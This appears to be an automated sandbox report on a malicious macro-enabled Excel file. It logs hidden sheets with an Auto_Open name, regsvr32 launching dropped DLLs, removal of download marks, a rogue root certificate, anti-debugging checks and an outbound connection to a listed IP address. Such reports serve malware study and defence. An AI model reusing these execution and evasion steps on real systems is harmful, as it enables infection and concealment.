name="Lefasbor1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId4"/><sheet name="Je1" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Je2" sheetId="6" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">#REF!</definedName><definedName name="DDWD1">#REF!</definedName><definedName name="DDWD2">#REF!</definedName><definedName name="DDWD3">#REF!</definedName><definedName name="DDWD4">#REF!</definedName><definedName name="GFGH1">EFALGV!$D$10</definedName><definedName name="GFGH2">EFALGV!$D$12</definedName><definedName name="GFGH3">EFALGV!$D$14</definedName><definedName name="GFGH4">EFALGV!$D$16</definedName><definedName name="GFGH5">EFALGV!$D$18</definedName><definedName name="GFGH6">EFALGV!$D$20</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFALGV!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory allocated: 76E90000 page execute and read and write

Source: DETAILS-0203.xlsm

ReversingLabs: Detection: 51%

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Viksf\nobrbbp.fhu"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Gcoddegjb\etpu.msa"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo"
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\sei.ocx	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Viksf\nobrbbp.fhu"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Gcoddegjb\etpu.msa"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo"

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DETAILS-0203.xlsm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE86A.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSM@28/5@1/41

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_1003B247 CoCreateInstance,CoCreateInstance,CoCreateInstance,OleRun,

4_2_1003B247

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10007DD4 LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf,

4_2_10007DD4

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: DETAILS-0203.xlsm	Initial sample: OLE zip file path = xl/media/image1.png
Source: DETAILS-0203.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: DETAILS-0203.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: DETAILS-0203.xlsm	Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: DETAILS-0203.xlsm	Initial sample: OLE zip file path = xl/calcChain.xml

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10049231 push ecx; ret		4_2_10049244
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10047725 push ecx; ret		4_2_10047738

Source: uVyr9TJj[1].dll.0.dr	Static PE information: section name: .didat
Source: sei.ocx.0.dr	Static PE information: section name: .didat

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,

4_2_10059DC8

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\sei.ocx	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\regsvr32.exe	File created: C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx (copy)	Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx (copy)

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\sei.ocx

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\sei.ocx

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Viksf\nobrbbp.fhu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Gcoddegjb\etpu.msa:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo:Zone.Identifier read attributes \| delete

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100014C4 IsIconic,		4_2_100014C4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100111D8 IsIconic,GetWindowPlacement,GetWindowRect,		4_2_100111D8

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2532	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 836	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2968	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 380	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2552	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2188	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1292	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1856	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2300	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2060	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 948	Thread sleep time: -120000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 696	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1180	Thread sleep time: -300000s >= -30000s

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\uVyr9TJj[1].dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 1.5 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 0.0 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_1004802B VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,

4_2_1004802B

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_1002992A __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,

4_2_1002992A

Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_4-36876
Source: C:\Windows\SysWOW64\regsvr32.exe	API call chain: ExitProcess graph end node			graph_4-37086

Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe	File Volume queried: C:\ FullSizeInformation

Source: regsvr32.exe, 0000000A.00000002.745116609.0000000000533000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: regsvr32.exe, 0000000E.00000002.769572637.00000000006B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: jECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_1004763E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_1004763E

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10059DC8 __decode_pointer,LoadLibraryA,GetProcAddress,GetLastError,GetLastError,GetLastError,__encode_pointer,InterlockedExchange,FreeLibrary,

4_2_10059DC8

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 4_2_10048B58 GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,__initptd,GetCurrentThreadId,__freeptd,

4_2_10048B58

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_002CAA52 mov eax, dword ptr fs:[00000030h]	6_2_002CAA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 7_2_003EAA52 mov eax, dword ptr fs:[00000030h]	7_2_003EAA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 8_2_0028AA52 mov eax, dword ptr fs:[00000030h]	8_2_0028AA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 9_2_00CDAA52 mov eax, dword ptr fs:[00000030h]	9_2_00CDAA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_0025AA52 mov eax, dword ptr fs:[00000030h]	10_2_0025AA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 11_2_004BAA52 mov eax, dword ptr fs:[00000030h]	11_2_004BAA52
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 13_2_0033AA52 mov eax, dword ptr fs:[00000030h]	13_2_0033AA52

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1004763E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_1004763E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10059655 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_10059655
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100500F4 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_100500F4

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe

Network Connect: 168.119.39.118 187

Source: Yara match

File source: app.xml, type: SAMPLE

Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Uxnbokktp\diqvt.pvx"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Khmezosgsvwvlhvi\qkla.nko"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Ddpavzijv\enzcvbgsf.ang"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Zjuyfwtdbmueckv\xkir.afb"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Pgxqwqvekhwwh\rhpkutq.uip"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Dksvywywhfyvdxey\snubtaeuhkc.jlg"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Heesquvdnbifaezb\zihdgfvo.tnp"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Viksf\nobrbbp.fhu"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Mrxcvolbdndnzuh\zephifx.tqg"	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Smmsikqqg\mwljdvldbkxxxd.uuj"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Gcoddegjb\etpu.msa"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wtgbrcr\cardutuwmkmjp.heo"

Source: C:\Windows\SysWOW64\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	4_2_100690A2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	4_2_10069138
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	4_2_100691AA
